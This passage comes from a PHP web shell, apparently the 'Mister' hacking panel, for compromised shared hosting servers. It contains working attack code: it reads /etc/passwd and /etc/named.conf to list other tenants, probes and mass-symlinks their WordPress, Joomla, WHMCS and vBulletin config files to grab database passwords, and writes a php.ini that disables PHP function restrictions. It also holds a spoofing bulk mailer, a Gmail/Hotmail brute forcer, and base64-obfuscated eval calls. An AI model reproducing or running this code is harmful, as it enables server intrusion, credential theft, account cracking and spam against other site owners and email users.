  935. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  936. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  937. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  938. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  939. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  940. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  941. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  942. <li><a href='?Mister=whois'>Website Whois</a></li>
  943. </ul></nav></center>";
  944. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>GET ALL DOMAINS
  945. </span><center></nav>";
  946. echo "<br><div class=content><center><span style='  color:#0000F0'> DOMAINS AND USERS </span></br>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center><span style='  color:red'>  ERROR </span><span> : U CAN'T READ [ /ETC/NAMED.CONF ]</center><br>");}echo '<table class=MisterText">
  947. <td>Domains</td><td>USERS</td></tr></table>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td></center>".$user['name']."</td></tr>";flush();}}}
  948.  exit;}
  949. ///////// CMS SCANNER
  950. if ($_GET['Mister'] == 'Cms') {
  951. echo "<br><center><nav class='social'><ul>
  952. <li><a href='?Mister=read'>Read /Etc/Passwd</a></li>
  953. <li><a href='?Mister=EtcExtract'> ExtracT Users From /etc/passwd</a></li>
  954. <li><a href='?Mister=Cms'>Cms Scanner</a></li>
  955. </ul></nav></center>";
  956. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>CMS SCANNER
  957. </span></nav><br><div class=content><center>";
  958. if(!@is_file('named.txt')){
  959. $d00m = @file("/etc/named.conf");
  960. }else{
  961. $d00m = @file("named.txt");
  962. }
  963. if(!$d00m)
  964. {
  965. die ("<meta http-equiv='refresh' content='0; url=?Mister=read'/>");
  966. }
  967. else
  968. {
  969. echo "<div>
  970. <table align='center' width='40%' class='Mistertext'><td><span style=' color:white'>Domains </b></font></td><td><span style=' color:white'>Script</b></span></td>";
  971. foreach($d00m as $dom){
  972. flush();
  973. flush();
  974. if(eregi("zone",$dom)){
  975. @preg_match_all('#zone "(.*)"#', $dom, $domvw);
  976. flush();
  977. if(@strlen(trim($domvw[1][0])) > 2){
  978. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));
  979. $wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp-config.php";
  980. $wpp=@get_headers($wpl);
  981. $wp=$wpp[0];
  982. $wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/wp-config.php";
  983. $wpp2=@get_headers($wp2);
  984. $wp12=$wpp2[0];
  985. $jo1=$pageURL."/sim/rut/home/".$user['name']."/public_html/configuration.php";
  986. $joo=@get_headers($jo1);
  987. $jo=$joo[0];
  988. $jo2=$pageURL."/sim/rut/home/".$user['name']."/public_html/joomla/configuration.php";
  989. $joo2=@get_headers($jo2);
  990. $jo12=$joo2[0];
  991. $vb1=$pageURL."/sim/rut/home/".$user['name']."/public_html/includes/config.php";
  992. $vbb=@get_headers($vb1);
  993. $vb=$vbb[0];
  994. $vb2=$pageURL."/sim/rut/home/".$user['name']."/public_html/vb/includes/config.php";
  995. $vbb2=@get_headers($vb2);
  996. $vb12=$vbb2[0];
  997. $vb3=$pageURL."/sim/rut/home/".$user['name']."/public_html/forum/includes/config.php";
  998. $vbb3=@get_headers($vb3);
  999. $vb13=$vbb3[0];
  1000. $wh1=$pageURL."/sim/rut/home/".$user['name']."public_html/clients/configuration.php";
  1001. $whh2= @get_headers($wh1);
  1002. $wh=$whh2[0];
  1003. $wh2=$pageURL."/sim/rut/home/".$user['name']."/public_html/support/configuration.php";
  1004. $whh2= @get_headers($wh2);
  1005. $wh12=$whh2[0];
  1006. $wh3=$pageURL."/sim/rut/home/".$user['name']."/public_html/database.php";
  1007. $whh3= @get_headers($wh3);
  1008. $wh13=$whh3[0];
  1009. $wh5=$pageURL."/sim/rut/home/".$user['name']."/public_html/config.php";
  1010. $whh5= @get_headers($wh5);
  1011. $wh15=$whh5[0];
  1012. $wspan=$pageURL."/sim/rut/home/".$user['name']."/public_html/client/configuration.php";
  1013. $whspan= @get_headers($wspan);
  1014. $wh14=$whspan[0];
  1015. $pos = strpos($wp, "200");
  1016. $config="&nbsp;";
  1017.  
  1018. if (strpos($wp, "200") == true )
  1019. {
  1020.  $config="<div><a href='".$wpl."' target='_blank'>Wordpress</a></div>";
  1021. }
  1022. elseif (strpos($wp12, "200") == true)
  1023. {
  1024.   $config="<div><a href='".$wp2."' target='_blank'>Wordpress</a></div>";
  1025. }
  1026.  
  1027. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
  1028. {
  1029. $config=" <div><a href='".$wh5."' target='_blank'>WHMCS</a></div>";
  1030.  
  1031. }
  1032. elseif (strpos($wh12, "200")  == true)
  1033. {
  1034.   $config ="<div> <a href='".$wh2."' target='_blank'>WHMCS</a></div>";
  1035. }
  1036.  
  1037. elseif (strpos($wh13, "200")  == true)
  1038. {
  1039. $config ="<div> <a href='".$wh3."' target='_blank'>WHMCS</a></div>";
  1040.  
  1041. }
  1042.  
  1043. elseif (strpos($jo, "200")  == true)
  1044. {
  1045. $config=" <div><a href='".$jo1."' target='_blank'>Joomla</a></div>";
  1046. }
  1047.  
  1048. elseif (strpos($jo12, "200")  == true)
  1049. {
  1050. $config=" <div><a href='".$jo2."' target='_blank'>Joomla</a></div>";
  1051. }
  1052.  
  1053. elseif (strpos($vb, "200")  == true)
  1054. {
  1055. $config=" <div><a href='".$vb1."' target='_blank'>vBulletin</a></div>";
  1056. }
  1057.  
  1058. elseif (strpos($vb12, "200")  == true)
  1059. {
  1060. $config=" <div><a href='".$vb2."' target='_blank'>vBulletin</a></div>";
  1061. }
  1062.  
  1063. elseif (strpos($vb13, "200")  == true)
  1064. {
  1065. $config=" <div><a href='".$vb3."' target='_blank'>vBulletin</a></div>";
  1066. }
  1067.  
  1068. else
  1069. {
  1070. continue;
  1071. }
  1072. flush();
  1073. flush();
  1074.  
  1075.  
  1076. $site = $user['name'] ;
  1077.  
  1078.  
  1079.  
  1080. flush();
  1081.  
  1082. echo "<tr><td><a href=http://www.".$domvw[1][0]."/>".$domvw[1][0]."</a></td>
  1083. <td>".$config."</div></td></tr>"; flush();
  1084.  
  1085. }
  1086. }
  1087. }
  1088. }
  1089. echo "</table></div><br><br>";
  1090. $FOTTER2 = "<footer class='MK-footer'>";  
  1091. echo ''. $FOTTER2 .'' ;
  1092. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1093. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1094. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1095. $SERVERIP1 = "SERVER IP :";
  1096. echo ''. $SERVERIP1 .'' ;
  1097. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1098. $SPAN3 = "</span>";
  1099. echo ''. $SPAN2 .'' ;
  1100. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1101. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1102. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1103. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1104. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1105. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1106. $HOSTOWNED1 = "HOST OWNED :";
  1107. echo ''. $HOSTOWNED1 .'' ;
  1108. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1109.  
  1110.  
  1111. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1112. echo ''. $REPORTERROR .'</a></span></footer>';
  1113. echo ''. $THEEND .'' ;
  1114. exit ;
  1115. }
  1116. ////////// MAILS
  1117. if ($_GET['Mister'] == 'Mails') {
  1118. echo "<br><center><nav class='social'><ul>
  1119. <li><a href='?Mister=Mails'>Separator Email Liste</a></li>
  1120. <li><a href='?Mister=mailers'>Unknow Mailer v1.0</a></li>
  1121. </ul></nav></center>";
  1122. echo "<nav class='Mister-nav'>
  1123. <center><span style='font-size:18px;  color:#0000F0'>SEPARATOR EMAIL LISTE</span></nav><br><div class=content><center>";
  1124. echo "<table align='center'  width='80%'></td><td>"; echo "
  1125. <form method='post' name='login' ><br>
  1126. <font size='4' color='#FFFFFF'> LISTE EMAILS : </font><br>
  1127. <textarea name='emails' cols='30' rows='10' for='texte' style='height:200px;width:100%' class='input'>
  1128. </textarea>
  1129. <br/><br/><center><input type='submit' name='submit' value='Go !' class='Mister-button'/></center></div></form>";
  1130. $emails = $_POST['emails'];
  1131. $ex = explode("\n",$emails);
  1132. $count = count($ex);
  1133. if(isset($emails)&&$count>=1){
  1134. echo "<center><font color='red' size='3'>$count </font><font size='3' color='#FFFFFF'> Number of emails : </font></center><br />";
  1135. }else{
  1136. exit;}
  1137.  
  1138. if(isset($emails)){
  1139.    
  1140.  
  1141. for($i=0;$i<=$count;$i++){
  1142. $d = strtolower($ex[$i]);
  1143.  
  1144. if(strstr($d,"hotmail")   || strstr($d,"live") || strstr($d,"msn") || strstr($d,"outlook")){
  1145. $hotmail.=$d;
  1146. $nh = $nh + 1;
  1147. }else{
  1148. if(strstr($d,"yahoo")   || strstr($d,"ymail")){
  1149. $yahoo.=$d;
  1150. $ny = $ny + 1;
  1151. }else{
  1152. if(strstr($d,"gmail")  || strstr($d,"googlemail")   ){
  1153. $gmail.=$d;
  1154. $ng = $ng + 1;
  1155. }else{
  1156. if(strstr($d,"aol")   ){
  1157. $aol.=$d;
  1158. $na = $na + 1;
  1159. }else{
  1160. if(strstr($d,"yahoo")   ){
  1161. $mailru .=$d;
  1162. $nr = $nr + 1;
  1163. }else{
  1164. if(strstr($d,"wanadoo")   ){
  1165. $wanadoo .=$d;
  1166. $nw = $nw + 1;
  1167. }else{
  1168. if(strstr($d,"ntlworld")   ){
  1169. $ntlworld .=$d;
  1170. $nt = $nt + 1;
  1171. }else{
  1172. if(strstr($d,"gmx")   ){
  1173. $gmx .=$d;
  1174. $ngm = $ngm + 1;
  1175. }else{
  1176. if(strstr($d,"@web.")   ){
  1177. $web .=$d;
  1178. $nw2 = $nw2 + 1;
  1179. }else{
  1180.  
  1181. $ather .=$d;
  1182. $nn=$nn + 1;
  1183. }
  1184. }
  1185. }
  1186. }
  1187. }
  1188. }
  1189. }
  1190. }
  1191. }
  1192. }
  1193. }              
  1194. ?>
  1195. <center><table class="Mister-Tabl" style="width: 100%">
  1196.     <tr>      
  1197. <td><center><font color='#FFFFFF' size='3'>hotmail ( <font color='red' size='3'><?echo $nh;?></font> ) </font></center><textarea name="hotmailx" cols="30" rows="10" ><?echo $hotmail;?></textarea></td>
  1198. <td><center><font color='#FFFFFF' size='3'>gmail ( <font color='red' size='3'><?echo $ng;?></font> )</font></center><textarea name="gmailx" cols="30" rows="10" ><?echo $gmail;?></textarea></td>
  1199. <td><center><font color='#FFFFFF' size='3'>aol ( <font color='red' size='3'><?echo $na;?></font> )</font></center><textarea name="aolxx" cols="30" rows="10" ><?echo $aol;?></textarea></td>
  1200. <td><center><font color='#FFFFFF' size='3'>yahoo ( <font color='red' size='3'><?echo $ny;?></font> ) </font></center><textarea name="yahoox" cols="30" rows="10" ><?echo $yahoo;?></textarea></td>
  1201. <td><center><font color='#FFFFFF' size='3'>mail.ru( <font color='red' size='3'><?echo $nr;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $mailru;?></textarea></td></tr>
  1202. <tr>
  1203. <td><center><font color='#FFFFFF' size='3'>wanadoo( <font color='red' size='3'><?echo $nw;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $wanadoo;?></textarea></td>
  1204. <td><center><font color='#FFFFFF' size='3'>ntlworld( <font color='red' size='3'><?echo $nt;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $ntlworld;?></textarea></td>
  1205. <td><center><font color='white' size='3'>gmx( <font color='red' size='3'><?echo $ngm;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $gmx;?></textarea></td>
  1206. <td><center><font color='#FFFFFF' size='3'>web( <font color='red' size='3'><?echo $nw2;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $web;?></textarea></td>
  1207. <td><center><font color='#FFFFFF' size='3'>ather mails( <font color='red' size='3'><?echo $nn-1;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $ather;?></textarea></td>
  1208. </tr></table></center></body>
  1209. <?php
  1210. $FOTTER2 = "<footer class='MK-footer'>";  
  1211. echo ''. $FOTTER2 .'' ;
  1212. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1213. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1214. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1215. $SERVERIP1 = "SERVER IP :";
  1216. echo ''. $SERVERIP1 .'' ;
  1217. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1218. $SPAN3 = "</span>";
  1219. echo ''. $SPAN2 .'' ;
  1220. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1221. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1222. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1223. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1224. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1225. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1226. $HOSTOWNED1 = "HOST OWNED :";
  1227. echo ''. $HOSTOWNED1 .'' ;
  1228. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1229.  
  1230.  
  1231. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1232. echo ''. $REPORTERROR .'</a></span></footer>';
  1233. echo ''. $THEEND .'' ; exit;}
  1234. ////// MAILER V1.0
  1235. if ($_GET['Mister'] == 'mailers') {
  1236. echo "<br><center><nav class='social'><ul>
  1237. <li><a href='?Mister=Mails'>Separator Email Liste</a></li>
  1238. <li><a href='?Mister=mailers'>Unknow Mailer v1.0</a></li>
  1239. </ul></nav></center>"; echo "<nav class='Mister-nav'>
  1240. <center><span style='font-size:18px;  color:#0000F0'>UNKNOW MAILER V1.0</span></nav><br><div class=content><center><table align='center' width='80%'>";
  1241. if(empty($_POST)==false){
  1242.     $emails = preg_split("/\r\n|\n|\r/",$_POST["UnSend"]);
  1243.     foreach($emails as $email){
  1244.         $headers   = array();
  1245.         $headers[] = "MIME-Version: 1.0";
  1246.         $headers[] = "Content-type: text/plain; charset=iso-8859-1";
  1247.         $headers[] = "From: " . $_POST["sendername"] . " <" . $_POST["senderemail"] . ">";
  1248.         $headers[] = "Bcc: " . $_POST["Targetname"] . " <" . $_POST["Targetemail"] . ">";
  1249.         $headers[] = "Reply-To: <" . $_POST["repto"] . ">";
  1250.         $headers[] = "Subject: " . $_POST["title"];
  1251.         if($_POST["epriority"]==1){
  1252.             $headers[] = "X-Priority: 1 (Highest)";
  1253.             $headers[] = "X-MSMail-Priority: High";
  1254.             $headers[] = "Importance: High";
  1255.         }elseif($_POST["epriority"]==3){
  1256.             $headers[] = "X-Priority: 5 (Lowest)";
  1257.             $headers[] = "X-MSMail-Priority: Low";
  1258.             $headers[] = "Importance: Low";
  1259.         }
  1260.         $headers[] = "X-Mailer: PHP/".phpversion();
  1261.         mail($email, $_POST["title"], $_POST["Texta"], implode("\r\n", $headers));
  1262.     }
  1263.     print "<span style=' color:#0000F0'>DONE! </span>";
  1264. }else{
  1265. ?>
  1266. <form method="POST"><table  style="width:70%"><td><br>
  1267. Emails :</br><textarea name="UnSend" cols="50" rows="15" maxlength="10000" style='height:150px;' wrap="soft" value="<? echo $_POST['UnSend'] ;?>" class="input"></textarea></td></table>
  1268. <table  style="width:50%"><tr><td>
  1269. <br>  Your Email : </br><input class="input" type="text" name="senderemail" value="<? echo $_POST['senderemail'] ;?>"></td></tr><tr><td>
  1270. <br>  Your Name : </br><input class="input" type="text" name="sendername" value="<? echo $_POST['sendername'] ;?>"></td></tr><tr><td>
  1271. <br> Reply-To : </br><input class="input" type="text" name="repto" value="<? echo $_POST['repto'] ;?>"></td></tr><tr><td>
  1272. <br>  Subject : </br><input class="input" type="text" name="title" value="<? echo $_POST['title'] ;?>"></td></tr><tr><td>
  1273. <br> Email Priority : </br><select name="epriority" value="<? echo $_POST['epriority'] ;?>">
  1274.         <option selected="" value="">Please Choose</option>
  1275.         <option value="1">High</option>
  1276.         <option value="2">Normal</option>
  1277.         <option value="3">Low</option></select><br><br>
  1278. </td></tr></table></td></tr></table></td></tr><tr><td>
  1279. <br><span color='#FFFFFF'>Your Text :</span></br><textarea class="input" name="Texta" cols="86" rows="15" maxlength="10000" wrap="soft" style="width:70%;height:150px;" value="<? echo $_POST['epriority'] ;?>"></textarea></td></td></tr></table><br><br>
  1280. <input type="Submit" value="SEND" class="Mister-button"></form><br><br><br><br>
  1281. <?php
  1282. }
  1283. //// FOOTER
  1284. $FOTTER2 = "<footer class='MK-footer'>";  
  1285. echo ''. $FOTTER2 .'' ;
  1286. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1287. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1288. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1289. $SERVERIP1 = "SERVER IP :";
  1290. echo ''. $SERVERIP1 .'' ;
  1291. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1292. $SPAN3 = "</span>";
  1293. echo ''. $SPAN2 .'' ;
  1294. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1295. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1296. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1297. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1298. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1299. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1300. $HOSTOWNED1 = "HOST OWNED :";
  1301. echo ''. $HOSTOWNED1 .'' ;
  1302. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1303. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1304. echo ''. $REPORTERROR .'</a></span></footer>';
  1305. echo ''. $THEEND .'' ;
  1306. exit;
  1307. }
  1308. /////////// BRUTE MAILERS
  1309. if ($_GET['Mister'] == 'Brutmailers') {
  1310.     echo "<center><nav class='social'><ul>
  1311. <li><a href='?Mister=cpanelBrut'>Turbo Cpanel Brut Force</a></li>
  1312. <li><a href='?Mister=Brutmailers'>Gmail & Hotmail Brute Force</a></li>
  1313. <li><a href='?Mister=AutoCp'>Auto Cpanel Finder/Cracker</a></li>
  1314. </ul></nav></center>";
  1315. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0'>GMAIL & HOTMAIL BRUTE FORCE</span></nav><br><div class=content><center>";
  1316. $FOTTER2 = "<footer class='MK-footer'>";  
  1317. echo ''. $FOTTER2 .'' ;
  1318. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1319. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1320. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1321. $SERVERIP1 = "SERVER IP :";
  1322. echo ''. $SERVERIP1 .'' ;
  1323. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1324. $SPAN3 = "</span>";
  1325. echo ''. $SPAN2 .'' ;
  1326. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1327. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1328. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1329. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1330. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1331. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  1332. $HOSTOWNED1 = "HOST OWNED :";
  1333. echo ''. $HOSTOWNED1 .'' ;
  1334. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1335.  
  1336.  
  1337. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1338. echo ''. $REPORTERROR .'</a></span></footer>';
  1339. echo ''. $THEEND .'<br>' ;
  1340. set_time_limit(0);
  1341. error_reporting(0);
  1342. class s1{
  1343. private $adres = array(
  1344. 'gmail' => '{imap.gmail.com:993/imap/ssl}',
  1345. 'hotmail' => '{pop3.live.com:995/pop3/ssl}'
  1346. );
  1347. private $imap;        
  1348. function __construct($gelen1,$gelen2){          
  1349. $uname     = explode("\r\n",$gelen1);    
  1350. $pwd     = explode("\r\n",$gelen2);    
  1351. foreach($pwd as $pass){
  1352. $pass = trim($pass);
  1353. foreach($uname as $user){
  1354. $user = trim($user);
  1355.                                  
  1356. if(preg_match('@gmail@si',$user)){
  1357. $this->baglan($this->adres["gmail"],$user,$pass);
  1358. }else{
  1359. $this->baglan($this->adres["hotmail"],$user,$pass);
  1360. }
  1361. }
  1362. }
  1363. }                
  1364. public function baglan($url,$user,$pass){            
  1365. $this->imap = imap_open($url,$user,$pass);
  1366. if($this->imap){
  1367. echo "<span color='#FFFFFF'>RESULT : </span><br> EMAILS : <span color='#FFFFFF'>$user </span> | PASSWORD :<span color='#FFFFFF'> $pass </span><br>";
  1368. }
  1369. }
  1370. function __destruct(){            
  1371. imap_close($this->imap);            
  1372. }
  1373. }        
  1374. echo '<table width="70%" border="0" cellspacing="0"></td><td>
  1375. <form id="form" method="POST" >
  1376. <textarea name="mail" rows="10" cols="5">LISTE EMAILS</textarea>  
  1377. <textarea name="sifre" rows="10" cols="5">PLISTE PASSWORD</textarea> <br /> <br />
  1378. <center><input type="submit" class="Mister-button" value="Brute !" /></center>
  1379. </form><br>
  1380. </div>
  1381. <div id="sonuc"> ';        
  1382. if($_POST){
  1383. $mails = $_POST["mail"];
  1384. $sifre = $_POST["sifre"];            
  1385. if((isset($mails)) and (isset($sifre))){    
  1386. $s1 = new s1($mails,$sifre);
  1387. }
  1388. }      
  1389. echo '</center></div> ';  
  1390. exit; }
  1391. //////////////// TOOLS
  1392. if ($_GET['Mister'] == 'cpanelBrut') {
  1393. echo "<center><nav class='social'><ul>
  1394. <li><a href='?Mister=cpanelBrut'>Turbo Cpanel Brut Force</a></li>
  1395. <li><a href='?Mister=Brutmailers'>Gmail & Hotmail Brute Force</a></li>
  1396. <li><a href='?Mister=AutoCp'>Auto Cpanel Finder/Cracker</a></li>
  1397. </ul></nav></center>";
  1398. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'> TURBO CPANEL BRUT FORCE
  1399. </span></nav><br><div class=content><center>";
  1400. ?>
  1401. <center><span style='color:#0000F0;font-size:18px;'>GET PHP.INI</span>
  1402. <form method=post>
  1403. <input type=submit name=ini value="GENERATE PHP.INI" class="Mister-button"/></form>
  1404. <?php
  1405. if(isset($_POST['ini']))
  1406. {
  1407. $r=fopen('php.ini','w');
  1408. $rr=" disable_functions=none ";
  1409. fwrite($r,$rr);
  1410. $link="<a target=_white href=php.ini><span class='input'>OPEN THIS LINK IN NEW TAB TO RUN PHP.INI</span></a>";
  1411. echo $link;
  1412.  
  1413. }
  1414. ?>
  1415. <p><span style='color:#0000F0;font-size:18px;'>SYMLINK BASED </span>
  1416. <form method=post>
  1417. <input type=submit name="usre" value="EXTRACT USERNAMES AND MASS SYMLINK" class="Mister-button"></form>
  1418. <?php
  1419. if(isset($_POST['usre'])){
  1420. ?><form method=post>
  1421. <textarea rows=10 cols=30 name=user class='input' style="height:200px;width:50%"><?php $users=file("/etc/passwd");
  1422. foreach($users as $user)
  1423. {
  1424. $str=explode(":",$user);
  1425. echo $str[0]."\n";
  1426. }
  1427. ?></textarea><br>
  1428. <input type=submit name=su value="START .HTACCESS"  class="Mister-button"></form><br><br>
  1429. <?php } ?>
  1430. <?php
  1431. error_reporting(0);
  1432. if(isset($_POST['su']))
  1433. {
  1434. $DIR=mkDIR('MKcpanel',0777);
  1435. $r = " Options all \n DIRectoryIndex MKcpanel.html \n Require None \n Satisfy Any";
  1436. $f = fopen('MKcpanel/.htaccess','w');
  1437.  
  1438. fwrite($f,$r);
  1439. $consym="<a href=MKcpanel/><span style='color:#0000F0'>GET FILES</font></a>";
  1440. echo "<br><span style='color:white'>FOLDER WHERE CONFIG FILES HAS BEEN SYMLINKED .../MKCPANEL/...<br><span style=color:#0000F0''>$consym</span>";
  1441.  
  1442. $usr=explode("\n",$_POST['user']);
  1443.  
  1444. foreach($usr as $uss )
  1445. {
  1446. $us=trim($uss);
  1447.  
  1448. $r="MKcpanel/";
  1449. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  1450. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  1451. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  1452. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  1453. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  1454. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  1455. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  1456. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  1457. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  1458. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  1459. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  1460. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  1461. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  1462. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  1463. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  1464. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  1465. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  1466. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  1467. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  1468. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  1469. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  1470. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  1471. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  1472. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  1473. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  1474. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  1475. }
  1476. }
  1477. ?>
  1478. <p><span style='color:#0000F0;font-size:18px;'>PASSWORD GRABING SECTION</span>
  1479. <form method=post>
  1480. <input type=submit name=sm value="GRABBING PASSWORDS FROM CONFIGURATION FILES" class="Mister-button"></form>
  1481. <?php
  1482. error_reporting(0);
  1483. set_time_limit(0);
  1484. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  1485. {
  1486.  
  1487. $ar0=explode($marqueurDebutLien, $text);
